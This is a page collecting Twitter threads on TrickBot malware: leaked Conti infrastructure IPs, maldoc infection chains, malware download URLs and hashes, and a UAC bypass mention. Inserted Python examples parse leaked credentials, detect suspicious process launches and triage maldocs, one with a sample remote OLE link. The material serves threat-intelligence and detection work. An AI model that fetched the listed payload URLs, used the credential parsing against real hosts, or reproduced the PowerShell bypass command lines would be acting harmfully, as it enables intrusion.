Discover and read the best of Twitter Threads about #TrickBot


Short 🧵on Trickbot. Vitaly Kovalev's (aka "Bentley") indictment was originally filed 13 years ago. It shows: 1) He was ID'd IRL long ago 2) Name and shame is now favored and 3) Maybe more old sealed indictments will be released? #infosec
US alleges Trickbot actors "are associated with Russian Intelligence Services." Conti leaks and other tidbits and data over the years pointed to potential ties between the state and cybercriminals. home.treasury.gov/news/press-rel… #infosec
It's also interesting that the indictment against Kovalev is for alleged banking and fraud crimes from the era before ransomware really took off. I wonder why they didn't release a fresh indictment related to Conti? #infosec #trickbot
Read 4 tweets
Buried lead: Samanage was an Israeli startup full of Unit 8200 prior to merging with SolarWinds.
Read 14 tweets
The #ContiLeaks contained some messages consisting of IP:Username:pass combinations for #Conti infrastructure.
This allows us to connect certain #Trickbot activity with the #Conti group:

1/x
The IPs in the image are the following:
117.252.69[.]134
117.252.68[.]15
116.206.153[.]212
103.78.13[.]150
103.47.170[.]131
103.47.170[.]130
118.91.190[.]42
117.197.41[.]36
117.222.63[.]77
117.252.69[.]210

2/x
Using @MaltegoHQ together with OTX/Alienvault and @virustotal integration, we are able to connect several of these IPs to #Trickbot activity:

3/x
Read 8 tweets
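An added example, not part of the thread and not the Maltego workflow the author used, of the first two steps it describes: pulling IP:Username:pass triples out of leaked chat text, normalising the defanged IPs, and pivoting each IP against OTX pulses the way the OTX transform does. The leak excerpt and the stub OTX responses are constructed (the passwords are invented; the IPs are the defanged ones from the tweet). The OTX endpoint URL and the JSON shape it parses (pulse_info.pulses[].name / tags) are assumed from AlienVault's public API, and the `fetch` parameter is a hypothetical hook so the pivot can run offline.

```python
import json
import re
import urllib.request
from typing import Callable, Dict, List, Optional

# Constructed excerpt in the IP:Username:pass shape the thread describes.
# The credentials are invented; the IPs are the defanged ones from the tweet.
LEAK_EXCERPT = """\
117.252.69[.]134:root:Hunter2
116.206.153[.]212:admin:Passw0rd!
103.47.170[.]130:root:qwerty123
Some chat line that is not a credential
"""

# One triple per line; the IP may be fully dotted or defanged with [.]
CRED_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:(?:\.|\[\.\])\d{1,3}){3}):(?P<user>[^:\s]+):(?P<pw>\S+)$"
)

# OTX "general" endpoint for an IPv4 indicator (assumed from the public OTX API).
OTX_URL = "https://otx.alienvault.com/api/v1/indicators/IPv4/{ip}/general"


def refang(ip: str) -> str:
    """Turn 117.252.69[.]134 back into a usable dotted quad."""
    return ip.replace("[.]", ".")


def defang(ip: str) -> str:
    """Defang the last dot only, matching the thread's convention."""
    head, _, last = refang(ip).rpartition(".")
    return f"{head}[.]{last}"


def extract_credentials(text: str) -> List[Dict[str, str]]:
    """Pull IP:user:pass triples out of leak text, refanging the IPs."""
    found = []
    for line in text.splitlines():
        m = CRED_RE.match(line.strip())
        if m:
            found.append({"ip": refang(m["ip"]), "user": m["user"], "password": m["pw"]})
    return found


def otx_fetch(url: str, api_key: Optional[str] = None) -> dict:
    """Live fetcher (not used by the offline demo); OTX accepts an optional X-OTX-API-KEY."""
    headers = {"X-OTX-API-KEY": api_key} if api_key else {}
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=15) as resp:
        return json.loads(resp.read())


def pivot_otx(ips: List[str], fetch: Callable[[str], dict] = otx_fetch,
              keyword: str = "trickbot") -> Dict[str, List[str]]:
    """For each IP, list the OTX pulse names whose name or tags mention the keyword."""
    hits: Dict[str, List[str]] = {}
    for ip in ips:
        data = fetch(OTX_URL.format(ip=ip))
        pulses = data.get("pulse_info", {}).get("pulses", [])
        hits[ip] = [
            p.get("name", "")
            for p in pulses
            if keyword in (p.get("name", "") + " " + " ".join(p.get("tags", []))).lower()
        ]
    return hits


# Constructed stand-in for OTX responses so the pivot runs offline.
FAKE_OTX = {
    "117.252.69.134": {"pulse_info": {"pulses": [
        {"name": "TrickBot C2 infrastructure", "tags": ["trickbot", "c2"]},
        {"name": "Generic scanner list", "tags": ["scanner"]},
    ]}},
    "116.206.153.212": {"pulse_info": {"pulses": [
        {"name": "Botnet nodes", "tags": ["TrickBot"]},
    ]}},
    "103.47.170.130": {"pulse_info": {"pulses": []}},
}


def fake_fetch(url: str) -> dict:
    """Offline fetcher: the IP is the path segment before '/general'."""
    ip = url.rsplit("/", 2)[-2]
    return FAKE_OTX.get(ip, {"pulse_info": {"pulses": []}})


if __name__ == "__main__":
    creds = extract_credentials(LEAK_EXCERPT)
    for ip, pulses in pivot_otx([c["ip"] for c in creds], fetch=fake_fetch).items():
        print(defang(ip), "->", pulses or "no TrickBot pulses")
```

Swap `fake_fetch` for the default `otx_fetch` (with an API key) to run it against live OTX; a VirusTotal pivot would follow the same pattern against the v3 `ip_addresses/{ip}` resource. Keep the refanged IPs out of anything you publish and defang them again on the way out, as the thread does.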
Interesting #maldoc
#TrickBot is distributed using a maldoc that uses #Emotet Template:

Process:
- It drops a small dll (1.xml) and executes it by creating an Outlook instance that calls rundll to execute 1.xml
- Drops a PS file and executes it
- Downloads and executes TrickBot
Maldoc:
b2859b4165a3047632174c1cd26b6756

1.xml:
8de70541621842ae7e3e6e21b41ee155

TrickBot download urls:
http://91.92.109.142/wolf.png
http://192.99.255.33/images/wolf.png
http://83.138.53.103/images/wolf.png
http://172.96.189.216/images/wolf.png
TrickBot:
ad5ad0ce03a4de9de5829cdf2ec78d59
b4dcf8f35e2ba2fa4af1ec6c95d4c179
efaf7ddf9bc9398f18c76bf16e23755e
ff1f685e2a3381d277e71580e1166b06
a051cc64e345d440606d3c28463b8f95
Read 3 tweets
ICYMI, @PwC_UK's 2020 #threatintel Year in Retrospect report is out now! All the team contributed but h/t to @KystleM_Reid! 🔥 You can check it out here: pwc.to/2ZPx7fo In this thread, I will summarise some of what I thought were key findings: 🧵👇 1/n
#Ransomware has become the most significant cyber security threat faced by organisations, irrespective of industry/location. TTPs have pivoted to mass data exfiltration prior to encryption, along with leaks & extortion. S/o to @andyp346 for all your work countering this.🙏 2/n
In 2020, 86% of the incidents that PwC’s Incident Response team responded to were attributable to cyber criminals. 79% of leaks happened in 2nd half of 2020. Our data sees Manufacturing, TMT, & Professional Services most impacted. 3/n
Read 19 tweets
Happening NOW! You can still join us here, and I'll be live-tweeting what @Robert_Lipovsky and @adorais share. sans.org/webcasts/star-…
.@Robert_Lipovsky kicking off with something I believe as well...crimeware is a greater threat to most orgs than state-sponsored threats. Even this week!
Many cyber crimes involve different jurisdictions - rarely is adversary infrastructure all in the same country, so law enforcement and private industry have to cooperate globally.
Read 28 tweets
2020-12-03:🔥 And ... [Major Discovery] 🤖"Persist, Brick, Profit -#TrickBot Offers New “#TrickBoot” UEFI-Focused Functionality"

🆕*First* Time Crimeware Group Pursued UEFI Firmware Exploitation | #YARA+IOCs in MISP JSON/CSV

@eclypsium | @IntelAdvanced
advanced-intel.com/post/persist-b…
📚:

1⃣TrickBoot is only one line of code away from being able to brick any device it finds to be vulnerable.
2⃣Historically, TrickBot actors have needed to evade and persist at the OS level - now a chance at UEFI level.
3⃣Actors are going lower in the stack to avoid detection.
✅Evolution of criminal intent:

⚓️Deep persistence achieved via UEFI/BIOS level to survive long-term on the host

⚡️New Incident Response Paradigm Shift:

*Firmware integrity checks might be particularly important for a device that is known to have been compromised by TrickBot.*
Read 4 tweets
🚨 We have a credible report of an imminent #cyber threat to the #healthcare industry: go.usa.gov/x7jKz

Some facilities have already been infected with ransomware over the last week. Here’s what we know. (1/4)
Since 2016, the cybercriminal enterprise behind #Trickbot, #Ryuk, and other ransomware tools has continued to develop new functionality and tools, increasing the ease, speed, and profitability of victimization. (2/4)
What began as a banking trojan and descendant of #Dyre malware, now provides its operators a full suite of tools to conduct a myriad of illegal cyber activities. (3/4)
Read 4 tweets
"salesforce.docx" uploaded yesterday
Low static detection (4/60): virustotal.com/gui/file/17f73…
Embedded executable "salesforce_report.exe"
• election-themed PE data
• CMSTPLUA UAC bypass
• probably #Trickbot 🤹🏽‍♂️🤖
• comms with: 181.112.157[.]42:449 (that cert 👀) & 193.26.217[.]243
"salesforce.docx"
MD5: ab284dccb09484ff6a3a116152edcb75

"salesforce_report.exe"
MD5: 3e0aff10a361a752ab160228410f2432
<Not on VT>
I've shared here:
@anyrun_app: app.any.run/tasks/02c2ef89…
@virusbay_io: beta.virusbay.io/sample/browse/…
@anyrun_app @virusbay_io I think this fresh sample uses the old CMSTPLUA UAC bypass from @hFireF0X: gist.github.com/hfiref0x/196af… (blast from the past!)
Personally, I haven't done much #Trickbot binary triage - so I don't know how/what else to extract (like configs, campaign codes).
Read 4 tweets
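An added example, not from either thread, of the process-creation detections the two execution chains above suggest: the Emotet-template maldoc that has an Outlook instance run rundll32 against a non-DLL file (1.xml) and then drops a PowerShell stage, and the salesforce_report.exe sample that uses the old CMSTPLUA UAC bypass. The CMSTPLUA CLSID constant is the well-known CLSID of that COM object and is not on the page; the event records are constructed in a Sysmon event-1-like shape (image, parent_image, cmdline) and are not real telemetry.

```python
import re
from typing import Dict, List, Tuple

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
LOLBIN_CHILDREN = {"rundll32.exe", "powershell.exe", "cmd.exe", "wscript.exe",
                   "cscript.exe", "mshta.exe", "regsvr32.exe"}
# CLSID of the CMSTPLUA COM object (ICMLuaUtil) used by the CMSTPLUA UAC bypass
# the thread refers to; a dllhost.exe surrogate hosting it is the visible artefact.
# Known constant, not taken from the page.
CMSTPLUA_CLSID = "{3e5fc7f9-9a51-4367-9063-a120244fbec7}"

# First argument after rundll32[.exe], quoted or not; the entry point follows a comma.
RUNDLL_ARG_RE = re.compile(r'^\s*"?\S*?rundll32(?:\.exe)?"?\s+(?:"([^"]+)"|(\S+))', re.I)

Finding = Tuple[int, str, str]  # (pid, rule, detail)


def image_name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rundll32_module(cmdline: str):
    """Return the module path rundll32 was asked to load, or None."""
    m = RUNDLL_ARG_RE.match(cmdline)
    if not m:
        return None
    return (m.group(1) or m.group(2)).split(",", 1)[0]


def detect(events: List[Dict[str, str]]) -> List[Finding]:
    findings: List[Finding] = []
    for ev in events:
        pid = ev["pid"]
        img = image_name(ev["image"])
        parent = image_name(ev.get("parent_image", ""))
        cmd = ev.get("cmdline", "")
        # rundll32 given a file that is not named *.dll (the 1.xml trick)
        if img == "rundll32.exe":
            mod = rundll32_module(cmd)
            if mod and not mod.lower().endswith(".dll"):
                findings.append((pid, "rundll32 loading a non-.dll file", mod))
        # Office / Outlook spawning a script host or LOLBin
        if parent in OFFICE_IMAGES and img in LOLBIN_CHILDREN:
            findings.append((pid, f"{parent} spawned {img}", cmd))
        # COM surrogate hosting CMSTPLUA: the UAC-bypass elevation moniker in use
        if img == "dllhost.exe" and CMSTPLUA_CLSID in cmd.lower():
            findings.append((pid, "CMSTPLUA COM surrogate started (possible UAC bypass)", cmd))
    return findings


# Constructed process-creation events, not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "parent_image": r"C:\Windows\System32\svchost.exe", "cmdline": "OUTLOOK.EXE /Embedding"},
    {"pid": 4388, "image": r"C:\Windows\System32\rundll32.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "cmdline": r'rundll32.exe "C:\Users\victim\AppData\Local\Temp\1.xml",#1'},
    {"pid": 4410, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r"powershell.exe -w hidden -ep bypass -f C:\Users\victim\AppData\Local\Temp\s.ps1"},
    {"pid": 4502, "image": r"C:\Windows\System32\dllhost.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"},
    {"pid": 4600, "image": r"C:\Windows\System32\rundll32.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for pid, rule, detail in detect(SAMPLE_EVENTS):
        print(pid, rule, "|", detail)
```

The rundll32 and Office-parent rules are high signal on their own. The CMSTPLUA rule is a pivot rather than a verdict: Windows also starts that surrogate for legitimate cmstp.exe use, so correlate the dllhost event with the medium-integrity process that triggered it and with what runs elevated right afterwards.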
1/6
Based on the evidence published, some bullets in the Everis case:

#Ryuk was not involved; the ransom note is different.

#Ryuk/#Bitpaymer take a long time to be deployed.

#Ryuk has been seen in combination with #Emotet->#Trickbot.
2/6
0day Bonjour Updater
Oct 10, Morphisec published "the abuse of an Apple zero-day vulnerability in the Apple Software Update utility that comes packaged with iTunes for Windows", related to #Bitpaymer adversaries.
3/6
BlueKeep
Over the weekend @GossiTheDog reported that his honeypot saw activity related to BlueKeep; working with @MalwareTechBlog, they found that the final payload is a #MoneroMiner. Some IOCs shared today are related to this activity.
Read 8 tweets
Today we're seeing a massive "Incoming transfer" spam campaign. The email body is blank, but the attachment is a document with malicious PowerShell that connects to malicious URLs to download a new variant of banking Trojan #Totbrick (#Trickbot).
Microsoft Word opens the document in Protected View, hence the instructions to "unlock the document" by clicking "Enable Editing". Don't! (SHA-256: 12dbd0cba4d5caf353f57a5d31ebb14d56d71ff410d58ef69391724ffef3002f, 7ea2df3db0c33dcca5a5634d6433f42d0ea4d9e0a23b865f27b39994cc20c4a3)
Windows Defender AV detects and blocks the document as TrojanDownloader:O97M/Powdow.KE. The payload is detected and blocked as Trojan:Win32/Totbrick (SHA-256: fc259872826dbe0cf623abbb2e886e4d877641add6d41b0121c121ade916c446)
Read 3 tweets
As researchers like @dvk01uk noted, multiple spam campaigns are delivering malicious document attachments that exploit several vulnerabilities to install banking trojan #Trickbot. The spam emails spoof several banks, including Barclays and Scotiabank.
The attachment is a malicious .docx file that exploits CVE-2017-0199 to download a malicious .rtf, which in turn exploits CVE-2017-8570 to drop a malicious PowerShell, and CVE-2017-11882 to run the said PowerShell, which downloads #Trickbot.
Protected view can prevent automatic execution of malicious documents. Office365 ATP blocks the malicious emails. Windows Defender AV blocks malicious documents and payload. Attack surface reduction in Windows Defender Exploit Guard can also help protect. blogs.technet.microsoft.com/secguide/2018/…
Read 3 tweets
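An added static-triage example for the two maldoc threads above (the "Enable Editing" PowerShell document and the .docx -> .rtf chain), not code from either thread or from Microsoft. It does not detect exploitation; it surfaces the structural indicators a triage analyst looks for before detonation: a macro project or an external OLE / attached-template relationship in a .docx (the shape a CVE-2017-0199-style remote load takes), and in an RTF the \objupdate control word, an Equation.3 object class, a Packager object, or the Equation Editor CLSID inside \objdata. Both sample files are constructed in memory; 198.51.100.7 is a documentation address, not an IOC from the page.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import List

REL_TAG = "{http://schemas.openxmlformats.org/package/2006/relationships}Relationship"
REMOTE_SCHEMES = ("http://", "https://", "file://", "\\\\")
# Equation Editor CLSID 0002CE02-0000-0000-C000-000000000046 as it appears,
# little-endian, when an OLE object stream is dumped into \objdata hex.
EQNEDT_CLSID_HEX = "02ce020000000000c000000000000046"


def inspect_docx(data: bytes) -> List[str]:
    """Flag macro projects and external oleObject / attachedTemplate relationships."""
    findings: List[str] = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        if any(n.lower().endswith("vbaproject.bin") for n in names):
            findings.append("vbaProject.bin present: macro-enabled content")
        for name in names:
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(REL_TAG):
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                target = rel.get("Target", "")
                if (rel.get("TargetMode") == "External"
                        and rtype in ("oleObject", "attachedTemplate")
                        and target.lower().startswith(REMOTE_SCHEMES)):
                    findings.append(f"{name}: external {rtype} -> {target}")
    return findings


def inspect_rtf(data: bytes) -> List[str]:
    """Flag OLE-object control words and classes associated with the RTF exploit chain."""
    text = data.decode("latin-1")
    findings: List[str] = []
    if re.search(r"\\objupdate\b", text):
        findings.append(r"\objupdate: OLE object forced to update on open")
    if re.search(r"\\objclass\s+Equation\.3", text, re.IGNORECASE):
        findings.append("Equation.3 OLE object (Equation Editor)")
    if EQNEDT_CLSID_HEX in re.sub(r"\s+", "", text).lower():
        findings.append(r"Equation Editor CLSID inside \objdata")
    if re.search(r"\\objclass\s+Package", text, re.IGNORECASE):
        findings.append("Packager OLE object (embedded file drop)")
    return findings


def build_sample_docx() -> bytes:
    """Constructed minimal .docx whose document relationships point at a remote OLE object."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
        '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://198.51.100.7/stage2.rtf" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


# Constructed RTF fragment: an auto-updating Equation.3 object whose objdata carries the CLSID.
SAMPLE_RTF = (
    b"{\\rtf1{\\object\\objocx\\objupdate{\\*\\objclass Equation.3}"
    b"{\\*\\objdata d0cf11e0a1b11ae1000000000000000002ce020000000000c000000000000046}}}"
)

if __name__ == "__main__":
    for f in inspect_docx(build_sample_docx()) + inspect_rtf(SAMPLE_RTF):
        print(f)
```

Run these before anything else: a .docx whose relationships reach out over HTTP, or an RTF that forces an object update on open, tells you what the Protected View prompt is hiding without having to click "Enable Editing" in a sandbox first. A clean result is not a clean file; obfuscated RTF (control-word splitting, hex noise) defeats the naive scan, so treat this as a first pass ahead of a proper RTF parser.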
Online banking #Trojan #TrickBot once again the payload of new #spam campaign; watch out for these emails in French
Attachment is script downloader; SHA256: 5ad6ef9af53e80604996e81279f075ff190eadcc3d163ace238cd9dca6840ffd
Payload is Trojan:Win32/TrickBot.A; SHA256: 16d8c3a87e5afe7224f255e32e9b99b97eaa0306f6e06e81f78ea13fbd042693
Read 3 tweets